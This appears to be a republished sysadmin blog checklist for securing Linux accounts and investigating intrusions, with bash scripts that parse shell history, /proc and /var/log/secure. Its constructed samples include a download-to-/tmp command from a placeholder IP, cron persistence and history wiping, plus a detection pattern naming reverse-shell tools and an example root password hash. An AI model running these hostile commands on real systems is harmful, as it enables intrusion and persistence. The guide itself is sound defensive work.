Information Security 13 min read

Essential Linux Account Security & Intrusion Investigation Checklist

This guide explains how to secure Linux accounts, examine critical system files, use command‑line tools to monitor logins, detect suspicious activity, analyze logs, and investigate potential intrusions, providing practical steps for administrators to harden and audit their servers.


Account Security

Details about the user information files. /etc/passwd stores one account per line in the format account:password:UID:GID:GECOS:directory:shell; the password field normally holds x, meaning the hash lives in /etc/shadow. Example entry:

<code># Format: account:password:UID:GID:GECOS:directory:shell
root:x:0:0:root:/root:/bin/bash</code>

Common commands to view users:

<code># Accounts that can get an interactive shell (anything other than nologin/false)
grep /bin/bash /etc/passwd
awk -F: '$7 !~ /(nologin|false)$/ {print $1 ":" $7}' /etc/passwd
# Users with UID 0 (root-equivalent); anything besides root is suspicious
awk -F: '$3==0{print $1}' /etc/passwd
# Users and groups with sudo rights, including drop-ins in /etc/sudoers.d/
grep -vE '^[[:space:]]*(#|$)' /etc/sudoers /etc/sudoers.d/* 2>/dev/null | grep 'ALL=(ALL'
grep -E '^(wheel|sudo):' /etc/group</code>

Note: an account whose password field is empty can still log in at the local console (PAM's nullok option), while sshd rejects it by default (PermitEmptyPasswords no). Do not rely on that split: lock or delete such accounts.

The shadow file /etc/shadow, readable only by root, stores the password hashes and password-ageing data in nine colon-separated fields: name:hash:last-change:min:max:warn:inactive:expire:reserved. A hash beginning with $6$ is SHA-512 crypt; last-change is counted in days since 1970-01-01; a hash field of ! or * means no password login is possible, and an empty field means no password is required. Example entry:

<code>root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::</code>

Commands to view the users currently logged in, their source hosts and what they are running, and the system uptime:

<code>who
w
uptime</code>

Intrusion Investigation

Check recent successful and failed logins with last and lastb. last reads /var/log/wtmp, which records every login session; lastb reads /var/log/btmp, the failed attempts. Intruders routinely truncate these files, so mark them append-only with chattr +a /var/log/wtmp (and the same for btmp). Treat the attribute as a tripwire rather than a guarantee: root can clear it again with chattr -a, so also forward authentication logs to a remote host where a local intruder cannot reach them.

List privileged users and disable or delete suspicious accounts. Note that usermod -L only locks the password; an intruder who planted an SSH key in the account can still log in, so expire the account or remove its shell as well, and copy the home directory and crontab before deleting anything:

<code># Lock the password only; SSH public-key login still works, so also expire the account or change the shell
usermod -L user
chage -E 0 user
usermod -s /sbin/nologin user
# Delete account (copy the home directory and crontab first: they are evidence)
userdel user
# Delete account and remove home directory
userdel -r user</code>

Inspect each user's .bash_history for command history. By default bash keeps 1000 entries and no timestamps, so raise the size and record a timestamp, the originating IP and the user name with each entry: change HISTSIZE in /etc/profile, append the remaining lines to the end of /etc/profile, then reload it:

<code># Save 10,000 commands instead of 1,000
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
# Append the following to the end of /etc/profile (bash-specific: shopt)
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]; then USER_IP=`hostname`; fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
# Reload in the current shell
source /etc/profile</code>

Two caveats. With HISTTIMEFORMAT set, bash writes the timestamp into .bash_history as a #<epoch> comment line, but the IP and user name only appear in the output of the history command, not in the file, so note which session a recovered file came from. And the history is under the user's control: an intruder can unset HISTFILE, set HISTSIZE=0 or delete the file, so an empty or truncated history is itself a finding, and reliable command logging needs a kernel-level source such as auditd execve rules.
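An added example (not part of the original article) of reading a history file produced with the configuration above: it pairs each command with its #<epoch> line, flags the commands that usually mean trouble, and shows that the file itself carries only the epoch. The sample history, the pattern list and the function names are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original article): read a .bash_history written
# with HISTTIMEFORMAT set, pair each command with its "#<epoch>" timestamp line,
# and flag commands an intruder typically runs. The history file is constructed
# for the demo; the pattern list and function names are assumptions.
set -u

HIST=$(mktemp)
trap 'rm -f "$HIST"' EXIT

# Constructed history: bash stores only the epoch, not the IP or user name that
# HISTTIMEFORMAT adds to "history" output
cat > "$HIST" <<'EOF'
#1700000000
ls -la
#1700000042
wget http://198.51.100.7/x.sh -O /tmp/x.sh
#1700000050
chmod +x /tmp/x.sh
#1700000061
echo '* * * * * /tmp/x.sh' | crontab -
#1700000099
unset HISTFILE
EOF

# Print "epoch<TAB>command"; commands without a preceding timestamp get "?"
history_with_time() {
  awk '
    /^#[0-9]+$/ { ts = substr($0, 2); next }
    { t = (ts == "" ? "?" : ts); print t "\t" $0 }
  ' "$1"
}

# Commands worth a second look: downloads, persistence, history tampering,
# new accounts, reverse shells
SUSPICIOUS='(wget|curl) |chattr |unset HISTFILE|HISTSIZE=0|useradd|crontab|/dev/tcp/|nc -l| -e /bin/(ba)?sh'
flag_suspicious() { history_with_time "$1" | grep -E "$SUSPICIOUS"; }

# Human-readable time for one epoch (GNU date; BSD date uses -r)
fmt_time() { date -u -d "@$1" '+%F %T' 2>/dev/null || date -u -r "$1" '+%F %T'; }

echo "== suspicious commands with time =="
flag_suspicious "$HIST" | while IFS="$(printf '\t')" read -r ts cmd; do
  printf '%s  %s\n' "$(fmt_time "$ts")" "$cmd"
done
```

Run it against a copy of each user's .bash_history (and root's). The pattern list is a starting point; the more useful signal is often the gap: a history that stops at "unset HISTFILE" tells you when the intruder started hiding.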

Check open ports and the processes behind them. ss has replaced netstat on most current distributions; both show the owning PID with -p when run as root. Preserve what you find before you kill it:

<code># Listening and established TCP sockets with the owning process
netstat -antlp | more   # or: ss -antlp
# Find the process behind a suspicious port (6666 as an example), then inspect it
netstat -antlp | grep ':6666'
ps -fp $PID
# Binary behind the PID; a " (deleted)" suffix means it was removed after start
ls -l /proc/$PID/exe
# Files, sockets and libraries the process has open, by PID, by name and by port
lsof -p $PID
lsof -c sshd
lsof -i :22
# Preserve the binary (works even if deleted) before killing the process
cp /proc/$PID/exe /root/evidence/$PID.bin
kill -9 $PID</code>
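The /proc checks above turned into a sweep of every process, added here as a worked example that is not part of the original article. It looks for the two process-level signs discussed: a binary that was deleted after it started (readlink on /proc/PID/exe ends in " (deleted)") and a working directory in a scratch location such as /tmp or /dev/shm. The proc root is a parameter so the demo runs against a constructed fake tree; the function names and the fake processes are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original article): walk /proc looking for
# processes whose binary was unlinked after start and processes running out of
# a scratch directory. The proc root is a parameter so the demo can use a
# constructed fake tree; on a real host run it as root, since /proc/PID/exe
# of other users' processes is unreadable otherwise.
set -u

pid_of() { basename "$(dirname "$1")"; }

# "PID<TAB>target" for every process whose executable has been unlinked
deleted_exe_procs() {
  root=${1:-/proc}
  for exe in "$root"/[0-9]*/exe; do
    [ -L "$exe" ] || continue
    target=$(readlink "$exe" 2>/dev/null) || continue
    case $target in
      *" (deleted)") printf '%s\t%s\n' "$(pid_of "$exe")" "$target" ;;
    esac
  done
}

# "PID<TAB>cwd" for every process running out of /tmp, /var/tmp or /dev/shm
suspicious_cwd_procs() {
  root=${1:-/proc}
  for cwd in "$root"/[0-9]*/cwd; do
    [ -L "$cwd" ] || continue
    target=$(readlink "$cwd" 2>/dev/null) || continue
    case $target in
      /tmp|/tmp/*|/var/tmp|/var/tmp/*|/dev/shm|/dev/shm/*)
        printf '%s\t%s\n' "$(pid_of "$cwd")" "$target" ;;
    esac
  done
}

# Constructed fake /proc: PID 202 is the implant (deleted binary, cwd in /dev/shm)
FAKE=$(mktemp -d)
trap 'rm -rf "$FAKE"' EXIT
mkdir -p "$FAKE/101" "$FAKE/202" "$FAKE/303"
ln -s /usr/sbin/sshd               "$FAKE/101/exe"; ln -s /           "$FAKE/101/cwd"
ln -s "/tmp/.x/kworkerd (deleted)" "$FAKE/202/exe"; ln -s /dev/shm    "$FAKE/202/cwd"
ln -s /usr/bin/bash                "$FAKE/303/exe"; ln -s /home/alice "$FAKE/303/cwd"

echo "== deleted executables =="; deleted_exe_procs "$FAKE"
echo "== scratch-dir cwd ==";     suspicious_cwd_procs "$FAKE"
# Against the live host (output depends on what is running):
# deleted_exe_procs; suspicious_cwd_procs
```

A hit from deleted_exe_procs is exactly the case where cp /proc/$PID/exe is the only remaining copy of the binary; take it before anything else.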

Examine startup scripts, SysV runlevel links and systemd units for services you do not recognise:

<code># Current runlevel (SysV) and every enabled systemd unit
runlevel
systemctl list-unit-files --state=enabled
# Legacy startup locations, then systemd unit files sorted by date to spot recent additions
cat /etc/rc.local; ls -l /etc/rc.d/rc3.d/
ls -lt /etc/systemd/system/ /etc/systemd/system/*.wants/
# How an intruder registers a SysV service (Debian-style): look for entries like this, do not run it
update-rc.d backdoor defaults 99</code>

Review cron jobs for every user and in every system location. Only list during an investigation: crontab -r deletes the current user's crontab.

<code># List the crontab of the current user and of root (never "crontab -r", which deletes it)
crontab -l
crontab -l -u root
# Per-user crontab files (path depends on the distribution) and system-wide schedules
ls -l /var/spool/cron/ /var/spool/cron/crontabs/ 2>/dev/null
cat /etc/crontab; ls -l /etc/cron.d/ /etc/cron.daily/
# Jobs that run something out of a scratch directory deserve a close look
grep -rE '/tmp/|/dev/shm/' /etc/cron* /var/spool/cron 2>/dev/null</code>

Search for suspicious files by name, size, modification time, owner or permissions, and for processes by resource usage. Prefer -ctime over -mtime when timestamps matter: touch can set the modification time to anything, but the inode change time is set by the kernel and cannot be forged with touch:

<code># By name
find / -name 'a.Test'
# By size (>1000M)
find / -size +1000M
# Modified or changed within the last day (-mtime can be forged with touch, -ctime cannot)
find / -mtime -1 -ls
find / -ctime -1 -ls
# Files owned by root under the current directory
find ./ -user root -type f
# SUID/SGID binaries (compare against a known-good list from an identical host)
find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null
# Sort processes by CPU or memory usage
ps -ef --sort -pcpu
ps -ef --sort -pmem</code>

Log Inspection

Key logs reside in /var/log/: secure (auth.log on Debian and Ubuntu), wtmp and btmp (the binary files behind last and lastb), lastlog, cron, messages (syslog on Debian and Ubuntu), apache2/access.log, and so on. Command history is not under /var/log; it is in each user's .bash_history. On systemd hosts journalctl (for example journalctl _COMM=sshd) covers the same authentication and service events.

Typical log-analysis commands (paths are for RHEL-style systems; substitute /var/log/auth.log on Debian and Ubuntu). Extract the source IP from the word after "from" rather than a fixed column, because "Failed password for invalid user X" lines shift the fields. Note that sudo -l only lists what the current user is allowed to run; what has actually been run is in the log:

<code># IPs attempting root brute-force, most frequent first
grep "Failed password for root" /var/log/secure | grep -oE 'from [0-9.]+' | awk '{print $2}' | sort | uniq -c | sort -nr
# Successful logins as "user ip method"
grep "Accepted " /var/log/secure | awk '{print $9, $11, $7}' | sort | uniq -c
# Account creation, removal and modification events
grep -E "useradd|userdel|usermod" /var/log/secure
# Sudo usage: sudo logs the invoking user, TTY and COMMAND
grep "COMMAND=" /var/log/secure</code>
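The commands above as functions run over constructed /var/log/secure lines, added here as a worked example and not code from the original article. It includes the "invalid user" variant that breaks a fixed-column awk, and adds the correlation an investigator actually wants: IPs that failed and then succeeded. Pass the real log path (or several, such as secure and its rotated copies) on a live host; the function names and the sample lines are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original article): the log-analysis commands
# above as functions, run over constructed /var/log/secure lines. Function
# names and sample lines are assumptions; pass real log paths on a live host.
set -u

LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT

# Constructed sshd/sudo/useradd lines in RHEL-style /var/log/secure format
cat > "$LOG" <<'EOF'
Mar  3 10:01:12 web1 sshd[2041]: Failed password for root from 203.0.113.9 port 51022 ssh2
Mar  3 10:01:15 web1 sshd[2041]: Failed password for root from 203.0.113.9 port 51024 ssh2
Mar  3 10:01:20 web1 sshd[2045]: Failed password for invalid user admin from 198.51.100.23 port 40010 ssh2
Mar  3 10:02:02 web1 sshd[2050]: Accepted publickey for alice from 192.0.2.10 port 52210 ssh2
Mar  3 10:05:40 web1 sshd[2077]: Accepted password for root from 203.0.113.9 port 51100 ssh2
Mar  3 10:06:01 web1 sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  3 10:07:30 web1 useradd[2100]: new user: name=backup2, UID=0, GID=0, home=/root, shell=/bin/bash
EOF

# Source IPs of failed logins, most frequent first ("count ip" per line).
# The IP is the word after "from", so "invalid user X" lines count too.
failed_login_ips() {
  grep 'Failed password' "$@" | grep -oE 'from [0-9.]+' | awk '{print $2}' | sort | uniq -c | sort -rn
}

# Successful logins as "user ip method"
accepted_logins() {
  sed -nE 's/.*Accepted ([a-z]+) for ([^ ]+) from ([0-9.]+).*/\2 \3 \1/p' "$@"
}

# IPs that failed at least once and also succeeded: the brute force that worked
brute_force_then_success() {
  { failed_login_ips "$@" | awk '{print $2}' | sort -u
    accepted_logins "$@"  | awk '{print $2}' | sort -u; } | sort | uniq -d
}

# Account creation/removal/modification, and every command run through sudo
account_changes() { grep -E 'useradd|userdel|usermod' "$@"; }
sudo_commands()   { grep -E 'sudo: +[^ ]+ : .*COMMAND=' "$@"; }

echo "== failed logins by IP ==";     failed_login_ips "$LOG"
echo "== successful logins ==";       accepted_logins "$LOG"
echo "== brute force that got in =="; brute_force_then_success "$LOG"
echo "== account changes ==";         account_changes "$LOG"
echo "== sudo commands ==";           sudo_commands "$LOG"
```

In the sample data the story reads off the output in order: 203.0.113.9 fails twice, then logs in as root with a password, then a UID 0 account named backup2 is created. That is the sequence to look for on a real host.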
Tags: Linux, System Administration, Log Analysis, Account Security, Intrusion Detection
Written by

Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
